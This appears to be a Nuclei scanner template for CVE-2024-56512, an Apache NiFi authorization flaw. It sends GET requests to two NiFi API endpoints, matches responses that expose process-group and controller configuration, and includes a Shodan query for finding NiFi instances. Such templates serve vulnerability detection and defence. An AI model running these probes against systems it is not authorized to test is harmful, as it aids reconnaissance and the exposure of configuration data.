id: CVE-2024-56512

info:
  name: Apache NiFi - Information Disclosure
  author: DhiyaneshDK
  severity: medium
  description: |
    Apache NiFi 1.10.0 through 2.0.0 are missing fine-grained authorization checking for Parameter Contexts, referenced Controller Services, and referenced Parameter Providers, when creating new Process Groups. Creating a new Process Group can include binding to a Parameter Context, but in cases where the Process Group did not reference any Parameter values, the framework did not check user authorization for the bound Parameter Context. Missing authorization for a bound Parameter Context enabled clients to download non-sensitive Parameter values after creating the Process Group.
  impact: |
    Attackers can create Process Groups bound to Parameter Contexts without proper authorization checks, enabling them to download non-sensitive parameter values and potentially access sensitive configuration data.
  remediation: |
    Update Apache NiFi to version 2.1.0 or later to address the missing authorization checks for Parameter Contexts.
  reference:
    - https://lists.apache.org/thread/cjc8fns5kjsho0s7vonlnojokyfx47wn
    - http://www.openwall.com/lists/oss-security/2024/12/28/1
    - https://github.com/absholi7ly/CVE-2024-56512-Apache-NiFi-Exploit/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-56512
  classification:
    cve-id: CVE-2024-56512
    epss-score: 0.37606
    epss-percentile: 0.97277
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"Nifi"
  tags: cve,cve2024,nifi,exposure,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}{{path}}"

    payloads:
      path:
        - /nifi-api/flow/process-groups/root
        - /nifi-api/controller/config

    matchers-condition: or
    matchers:
      - type: dsl
        name: process-group-information
        dsl:
          - 'contains(content_type, "application/json")'
          - 'contains_all(body, "processGroupFlow", "breadcrumb")'
          - 'status_code == 200'
        condition: and

      - type: dsl
        name: config-information
        dsl:
          - 'contains(content_type, "application/json")'
          - 'contains_all(body, "maxTimerDrivenThreadCount", "maxEventDrivenThreadCount")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a0047304502201ddda921a7a3ff06b5c6cb40ade9f5ca61dce5a985e8f7d1aa79373d38a2800c022100bdef0a23154e38ee609b62c1cfa1ff391d766ecd76d797328f7755d9e84ac9f7:922c64590222798bb761d5b6d8e72950